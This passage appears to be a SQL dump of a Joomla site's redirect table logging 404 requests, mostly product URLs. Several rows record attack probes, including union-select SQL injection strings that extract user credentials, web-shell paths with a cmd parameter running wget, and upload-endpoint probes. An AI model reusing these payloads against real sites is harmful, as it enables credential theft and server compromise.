00:00:00',301),(8512,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/images/com_adsmanager/ads/uploa','','','',1,0,'2016-11-20 05:18:16','0000-00-00 00:00:00',301),(8513,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php','','','',1,0,'2016-11-20 05:18:19','0000-00-00 00:00:00',301),(8514,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/readme.php?cmd=cd /tmp;wget htt','','','',1,0,'2016-11-20 05:18:19','0000-00-00 00:00:00',301),(8515,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php','','','',1,0,'2016-11-20 05:18:20','0000-00-00 00:00:00',301),(8516,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/components/index.inc.php?shxxx=','','','',1,0,'2016-11-20 05:18:20','0000-00-00 00:00:00',301),(8517,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php','','','',1,0,'2016-11-20 05:18:21','0000-00-00 00:00:00',301),(8518,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/content-component/article-categories&amp;sa=U&amp;ved=0ahUKEwiZmoPOm7bQAhXDXhoKHbHgAgc4MhAWCLoBMCQ&amp;usg=AFQjCNFpnGoh0kq_Sd9AxId8eyuCnzJb5A/tmp/plupload/millo.php?cmd=cd /','','','',1,0,'2016-11-20 05:18:21','0000-00-00 00:00:00',301),(8519,'http://www.3s-technologies.com.tr//index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select 0x6275677363616E776B),floor(rand(0)*2))x from information_schema.tables gro','','','',1,0,'2016-11-22 12:28:16','0000-00-00 00:00:00',301),(8520,'http://3s-technologies.com.tr//index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+gid=25','','','',1,0,'2016-11-22 13:17:51','0000-00-00 00:00:00',301),(8521,'http://3s-technologies.com.tr//index.php?option=com_youtubegallery&view=youtubegallery&listid=-1+union+select+1,1,1,1,1,1,1&themeid=1','','','',1,0,'2016-11-23 11:28:53','0000-00-00 00:00:00',301),(8522,'http://3s-technologies.com.tr//index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=24+limit+0,1--+a','','','',1,0,'2016-11-23 23:12:32','0000-00-00 00:00:00',301),(8523,'http://3s-technologies.com.tr//index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=25+limit+0,1--+a','','','',1,0,'2016-11-23 23:12:35','0000-00-00 00:00:00',301),(8524,'http://3s-technologies.com.tr/index.php/create-an-account.html','','http://3s-technologies.com.tr/index.php/create-an-account.html','',1,0,'2016-11-24 00:47:48','0000-00-00 00:00:00',301),(8525,'http://3s-technologies.com.tr/index.php/en/create-an-account.html','','http://3s-technologies.com.tr/index.php/en/create-an-account.html','',1,0,'2016-11-24 12:20:43','0000-00-00 00:00:00',301),(8526,'http://3s-technologies.com.tr/index.php/en//components/com_sexycontactform/fileupload/index.php','','http://www.google.com/','',1,0,'2016-11-25 02:37:29','0000-00-00 00:00:00',301),(8527,'http://3s-technologies.com.tr/index.php/en//components/com_creativecontactform/fileupload/index.php','','http://www.google.com/','',1,0,'2016-11-25 09:54:52','0000-00-00 00:00:00',301),(8528,'http://3s-technologies.com.tr/index.php/en?option=com_user&view=register','','http://3s-technologies.com.tr/index.php/en?option=com_user&view=register','',1,0,'2016-11-26 04:59:25','0000-00-00 00:00:00',301),(8529,'http://3s-technologies.com.tr/index.php/en/components/com_sexycontactform/fileupload/index.php','','http://3s-technologies.com.tr/index.php/en/components/com_sexycontactform/fileupload/index.php','',1,0,'2016-11-26 05:44:05','0000-00-00 00:00:00',301),(8530,'http://3s-technologies.com.tr/index.php/ru/create-an-account.html','','http://3s-technologies.com.tr/index.php/ru/create-an-account.html','',1,0,'2016-11-27 11:33:34','0000-00-00 00:00:00',301),(8531,'http://3s-technologies.com.tr//index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf\'','','','',1,0,'2016-11-27 13:43:40','0000-00-00 00:00:00',301),(8532,'http://3s-technologies.com.tr//index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=24+limit+0,1--','','','',1,0,'2016-11-27 20:46:59','0000-00-00 00:00:00',301),(8533,'http://3s-technologies.com.tr//index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=25+limit+0,1--','','','',1,0,'2016-11-27 20:47:02','0000-00-00 00:00:00',301),(8534,'http://3s-technologies.com.tr/index.php/ru?option=com_user&view=register','','http://3s-technologies.com.tr/index.php/ru?option=com_user&view=register','',1,0,'2016-11-28 01:11:11','0000-00-00 00:00:00',301),(8535,'http://3s-technologies.com.tr//index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=24+limit+','','','',1,0,'2016-11-29 06:10:12','0000-00-00 00:00:00',301),(8536,'http://3s-technologies.com.tr//index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=25+limit+','','','',1,0,'2016-11-29 06:10:14','0000-00-00 00:00:00',301),(8537,'http://3s-technologies.com.tr//index.php?option=com_muscol&view=artists&letter=1\"+and+1=0+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gi','','','',1,0,'2016-11-29 14:12:52','0000-00-00 00:00:00',301),(8538,'http://3s-technologies.com.tr//?view=videos&type=member&user_id=1 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26,27 from+jos_users+w','','','',1,0,'2016-11-29 19:58:29','0000-00-00 00:00:00',301),(8539,'http://3s-technologies.com.tr//index.php?view=videos&type=member&user_id=66+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_','','','',1,0,'2016-11-30 11:05:35','0000-00-00 00:00:00',301),(8540,'http://www.3s-technologies.com.tr/index.php/tr/login.php','','','',1,0,'2016-12-07 06:04:24','0000-00-00 00:00:00',301),(8541,'http://3s-technologies.com.tr/','','','',4,0,'2016-12-11 16:31:30','0000-00-00 00:00:00',301),(8542,'http://3s-technologies.com.tr/index.php/en/?format=debug&option=com_ajax&module=1','','http://3s-technologies.com.tr/index.php?format=debug&option=com_ajax&module=1','',1,0,'2016-12-12 16:22:06','0000-00-00 00:00:00',301),(8543,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/images/stories/petx.php?baca','','','',1,0,'2016-12-14 05:15:35','0000-00-00 00:00:00',301),(8544,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/images/stories/explore.php?baca','','','',1,0,'2016-12-14 05:15:39','0000-00-00 00:00:00',301),(8545,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/images/stories/magic.php.png','','','',1,0,'2016-12-14 05:16:04','0000-00-00 00:00:00',301),(8546,'http://www.3s-technologies.com.tr/index.php/en/using-joomla/extensions/modules/images/stories/magic.php.png?baca','','','',1,0,'2016-12-14 05:16:05','0000-00-00 00:00:00',301),(8547,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/utility-modules/images/stories/petx.php?baca','','','',1,0,'2016-12-16 21:50:09','0000-00-00 00:00:00',301),(8548,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/utility-modules/images/stories/explore.php?baca','','','',1,0,'2016-12-16 21:50:17','0000-00-00 00:00:00',301),(8549,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/utility-modules/images/stories/magic.php.png','','','',1,0,'2016-12-16 21:50:53','0000-00-00 00:00:00',301),(8550,'http://www.3s-technologies.com.tr/index.php/tr/using-joomla/extensions/modules/utility-modules/images/stories/magic.php.png?baca','','','',1,0,'2016-12-16 21:51:01','0000-00-00 00:00:00',301),(8551,'http://3s-technologies.com.tr/index.php?option=com_rpl&view=propertyshow&pid=1&Itemid','','','',1,0,'2016-12-18 16:59:50','0000-00-00 00:00:00',301),(8552,'http://proneo-led.com/3s-technologies.com.tr/joomla2.5-was_working/index.php/en/component/content/category/81-english-uk/english-content','','','',1,0,'2017-10-23 16:07:08','0000-00-00 00:00:00',301),(8553,'http://www.3s-technologies.com.tr/index.php/tr/favicon.ico','','http://www.3s-technologies.com.tr/index.php/tr/','',2,0,'2017-11-04 15:58:07','0000-00-00 00:00:00',301),(8554,'http://www.3s-technologies.com.tr/index.php/tr/robots.txt','','','',1,0,'2017-11-04 16:08:44','0000-00-00 00:00:00',301),(8555,'http://3s-technologies.com.tr/index.php/tr/robots.txt','','','',1,0,'2017-11-04 16:16:03','0000-00-00 00:00:00',301),(8556,'http://www.3s-technologies.com.tr/tr/favicon.ico','','http://www.3s-technologies.com.tr/tr/','',1163,0,'2017-11-04 22:35:43','0000-00-00 00:00:00',301),(8557,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jce/media/img/menu/jce-cpanel.png',NULL,'http://www.3s-technologies.com.tr/administrator/','',58,0,'2017-11-04 22:39:14','0000-00-00 00:00:00',301),(8558,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jce/media/img/menu/jce-config.png',NULL,'http://www.3s-technologies.com.tr/administrator/','',58,0,'2017-11-04 22:39:14','0000-00-00 00:00:00',301),(8559,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jce/media/img/menu/jce-profiles.png',NULL,'http://www.3s-technologies.com.tr/administrator/','',58,0,'2017-11-04 22:39:14','0000-00-00 00:00:00',301),(8560,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jce/media/img/menu/jce-install.png',NULL,'http://www.3s-technologies.com.tr/administrator/','',59,0,'2017-11-04 22:39:14','0000-00-00 00:00:00',301),(8561,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae',NULL,'','',43,0,'2017-11-04 22:53:19','0000-00-00 00:00:00',301),(8562,'http://www.3s-technologies.com.tr/index.php/tr/administrator/components/com_jce/media/img/menu/jce-cpanel.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_config','',2,0,'2017-11-04 22:54:24','0000-00-00 00:00:00',301),(8563,'http://www.3s-technologies.com.tr/index.php/tr/administrator/components/com_jce/media/img/menu/jce-profiles.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_config','',2,0,'2017-11-04 22:54:24','0000-00-00 00:00:00',301),(8564,'http://www.3s-technologies.com.tr/index.php/tr/administrator/components/com_jce/media/img/menu/jce-config.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_config','',2,0,'2017-11-04 22:54:24','0000-00-00 00:00:00',301),(8565,'http://www.3s-technologies.com.tr/index.php/tr/administrator/components/com_jce/media/img/menu/jce-install.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_config','',2,0,'2017-11-04 22:54:24','0000-00-00 00:00:00',301),(8566,'http://3s-technologies.com.tr/tr/robots.txt',NULL,'','',67559,0,'2017-11-04 23:28:01','0000-00-00 00:00:00',301),(8567,'http://www.3s-technologies.com.tr/tr/robots.txt',NULL,'','',72451,0,'2017-11-04 23:28:19','0000-00-00 00:00:00',301),(8568,'http://www.3s-technologies.com.tr/en/favicon.ico',NULL,'http://www.3s-technologies.com.tr/en/products/screen-printer','',42,0,'2017-11-04 23:31:44','0000-00-00 00:00:00',301),(8569,'http://www.3s-technologies.com.tr/en/administrator/components/com_jce/media/img/menu/jce-profiles.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_menus&view=items','',41,0,'2017-11-04 23:43:59','0000-00-00 00:00:00',301),(8570,'http://www.3s-technologies.com.tr/en/administrator/components/com_jce/media/img/menu/jce-cpanel.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_menus&view=items','',40,0,'2017-11-04 23:43:59','0000-00-00 00:00:00',301),(8571,'http://www.3s-technologies.com.tr/en/administrator/components/com_jce/media/img/menu/jce-install.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_menus&view=items','',40,0,'2017-11-04 23:43:59','0000-00-00 00:00:00',301),(8572,'http://www.3s-technologies.com.tr/en/administrator/components/com_jce/media/img/menu/jce-config.png',NULL,'http://www.3s-technologies.com.tr/administrator/index.php?option=com_menus&view=items','',41,0,'2017-11-04 23:43:59','0000-00-00 00:00:00',301),(8573,'https://3s-technologies.com.tr/tr/robots.txt',NULL,'','',40540,0,'2017-11-05 00:57:45','0000-00-00 00:00:00',301),(8574,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name',NULL,'','',48,0,'2017-11-05 02:24:35','0000-00-00 00:00:00',301),(8575,'http://3s-technologies.com.tr/tr/urunler/bölgesel-lehimleme',NULL,'','',417,0,'2017-11-05 03:17:58','0000-00-00 00:00:00',301),(8576,'http://3s-technologies.com.tr/tr/component/content/category?format=feed&type=atom',NULL,'','',7,0,'2017-11-05 04:07:57','0000-00-00 00:00:00',301),(8577,'http://3s-technologies.com.tr/tr/urunler/smd-fırın/gf-12-hc-ht-detail',NULL,'','',382,0,'2017-11-05 04:14:22','0000-00-00 00:00:00',301),(8578,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',365,0,'2017-11-05 04:21:49','0000-00-00 00:00:00',301),(8579,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',371,0,'2017-11-05 04:21:52','0000-00-00 00:00:00',301),(8580,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc',NULL,'','',370,0,'2017-11-05 04:21:55','0000-00-00 00:00:00',301),(8581,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,pc.ordering,product_name',NULL,'','',369,0,'2017-11-05 04:21:59','0000-00-00 00:00:00',301),(8582,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name/dirdesc',NULL,'','',363,0,'2017-11-05 04:22:12','0000-00-00 00:00:00',301),(8583,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,`p`.product_sku',NULL,'','',370,0,'2017-11-05 04:22:16','0000-00-00 00:00:00',301),(8584,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',382,0,'2017-11-05 04:22:19','0000-00-00 00:00:00',301),(8585,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',384,0,'2017-11-05 04:22:26','0000-00-00 00:00:00',301),(8586,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',380,0,'2017-11-05 04:22:29','0000-00-00 00:00:00',301),(8587,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',379,0,'2017-11-05 04:22:32','0000-00-00 00:00:00',301),(8588,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',377,0,'2017-11-05 04:22:35','0000-00-00 00:00:00',301),(8589,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',370,0,'2017-11-05 04:22:38','0000-00-00 00:00:00',301),(8590,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',378,0,'2017-11-05 04:22:42','0000-00-00 00:00:00',301),(8591,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',395,0,'2017-11-05 04:22:44','0000-00-00 00:00:00',301),(8592,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',367,0,'2017-11-05 04:22:47','0000-00-00 00:00:00',301),(8593,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',386,0,'2017-11-05 04:22:55','0000-00-00 00:00:00',301),(8594,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',368,0,'2017-11-05 04:23:01','0000-00-00 00:00:00',301),(8595,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,ordering',NULL,'','',373,0,'2017-11-05 04:23:03','0000-00-00 00:00:00',301),(8596,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',372,0,'2017-11-05 04:23:10','0000-00-00 00:00:00',301),(8597,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',364,0,'2017-11-05 04:23:13','0000-00-00 00:00:00',301),(8598,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',379,0,'2017-11-05 04:23:17','0000-00-00 00:00:00',301),(8599,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',355,0,'2017-11-05 04:23:19','0000-00-00 00:00:00',301),(8600,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_sku',NULL,'','',374,0,'2017-11-05 04:23:22','0000-00-00 00:00:00',301),(8601,'http://3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',373,0,'2017-11-05 04:23:27','0000-00-00 00:00:00',301),(8602,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',357,0,'2017-11-05 04:23:30','0000-00-00 00:00:00',301),(8603,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',379,0,'2017-11-05 04:23:33','0000-00-00 00:00:00',301),(8604,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',373,0,'2017-11-05 04:23:38','0000-00-00 00:00:00',301),(8605,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name',NULL,'','',389,0,'2017-11-05 04:23:41','0000-00-00 00:00:00',301),(8606,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',366,0,'2017-11-05 04:23:47','0000-00-00 00:00:00',301),(8607,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',373,0,'2017-11-05 04:23:50','0000-00-00 00:00:00',301),(8608,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',364,0,'2017-11-05 04:23:56','0000-00-00 00:00:00',301),(8609,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',373,0,'2017-11-05 04:24:01','0000-00-00 00:00:00',301),(8610,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',393,0,'2017-11-05 04:24:05','0000-00-00 00:00:00',301),(8611,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',370,0,'2017-11-05 04:24:11','0000-00-00 00:00:00',301),(8612,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',393,0,'2017-11-05 04:24:15','0000-00-00 00:00:00',301),(8613,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku',NULL,'','',376,0,'2017-11-05 04:24:20','0000-00-00 00:00:00',301),(8614,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',372,0,'2017-11-05 04:24:22','0000-00-00 00:00:00',301),(8615,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,category_name',NULL,'','',397,0,'2017-11-05 04:24:26','0000-00-00 00:00:00',301),(8616,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',370,0,'2017-11-05 04:24:32','0000-00-00 00:00:00',301),(8617,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',396,0,'2017-11-05 04:24:35','0000-00-00 00:00:00',301),(8618,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',371,0,'2017-11-05 04:24:41','0000-00-00 00:00:00',301),(8619,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,ordering',NULL,'','',377,0,'2017-11-05 04:24:44','0000-00-00 00:00:00',301),(8620,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name',NULL,'','',365,0,'2017-11-05 04:24:49','0000-00-00 00:00:00',301),(8621,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,pc.ordering,product_name/dirdesc',NULL,'','',371,0,'2017-11-05 04:24:53','0000-00-00 00:00:00',301),(8622,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name',NULL,'','',392,0,'2017-11-05 04:24:59','0000-00-00 00:00:00',301),(8623,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',376,0,'2017-11-05 04:25:03','0000-00-00 00:00:00',301),(8624,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',395,0,'2017-11-05 04:25:09','0000-00-00 00:00:00',301),(8625,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',394,0,'2017-11-05 04:25:14','0000-00-00 00:00:00',301),(8626,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın',NULL,'','',396,0,'2017-11-05 04:47:24','0000-00-00 00:00:00',301),(8627,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,`p`.product_sku/dirdesc',NULL,'','',370,0,'2017-11-05 04:47:26','0000-00-00 00:00:00',301),(8628,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,category_name',NULL,'','',379,0,'2017-11-05 04:47:27','0000-00-00 00:00:00',301),(8629,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,category_name/dirdesc',NULL,'','',364,0,'2017-11-05 04:47:29','0000-00-00 00:00:00',301),(8630,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,mf_name',NULL,'','',355,0,'2017-11-05 04:47:31','0000-00-00 00:00:00',301),(8631,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,mf_name/dirdesc',NULL,'','',373,0,'2017-11-05 04:47:32','0000-00-00 00:00:00',301),(8632,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,pc.ordering,product_name/dirdesc',NULL,'','',362,0,'2017-11-05 04:47:34','0000-00-00 00:00:00',301),(8633,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,product_name',NULL,'','',368,0,'2017-11-05 04:47:36','0000-00-00 00:00:00',301),(8634,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-fırın/by,product_name/dirdesc',NULL,'','',361,0,'2017-11-05 04:47:37','0000-00-00 00:00:00',301),(8635,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı',NULL,'','',393,0,'2017-11-05 04:47:39','0000-00-00 00:00:00',301),(8636,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,`p`.product_sku/dirdesc',NULL,'','',378,0,'2017-11-05 04:47:41','0000-00-00 00:00:00',301),(8637,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,category_name',NULL,'','',373,0,'2017-11-05 04:47:42','0000-00-00 00:00:00',301),(8638,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',367,0,'2017-11-05 04:47:44','0000-00-00 00:00:00',301),(8639,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,mf_name',NULL,'','',369,0,'2017-11-05 04:47:46','0000-00-00 00:00:00',301),(8640,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',361,0,'2017-11-05 04:47:47','0000-00-00 00:00:00',301),(8641,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',357,0,'2017-11-05 04:47:49','0000-00-00 00:00:00',301),(8642,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',353,0,'2017-11-05 04:47:50','0000-00-00 00:00:00',301),(8643,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,product_name',NULL,'','',355,0,'2017-11-05 04:47:52','0000-00-00 00:00:00',301),(8644,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',360,0,'2017-11-05 04:47:54','0000-00-00 00:00:00',301),(8645,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız',NULL,'','',386,0,'2017-11-05 04:47:55','0000-00-00 00:00:00',301),(8646,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,`p`.product_sku',NULL,'','',362,0,'2017-11-05 04:47:57','0000-00-00 00:00:00',301),(8647,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',361,0,'2017-11-05 04:47:59','0000-00-00 00:00:00',301),(8648,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,category_name',NULL,'','',356,0,'2017-11-05 04:48:00','0000-00-00 00:00:00',301),(8649,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',362,0,'2017-11-05 04:48:02','0000-00-00 00:00:00',301),(8650,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,mf_name',NULL,'','',364,0,'2017-11-05 04:48:04','0000-00-00 00:00:00',301),(8651,'http://3s-technologies.com.tr/tr/urunler/manufacturer/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',359,0,'2017-11-05 04:48:05','0000-00-00 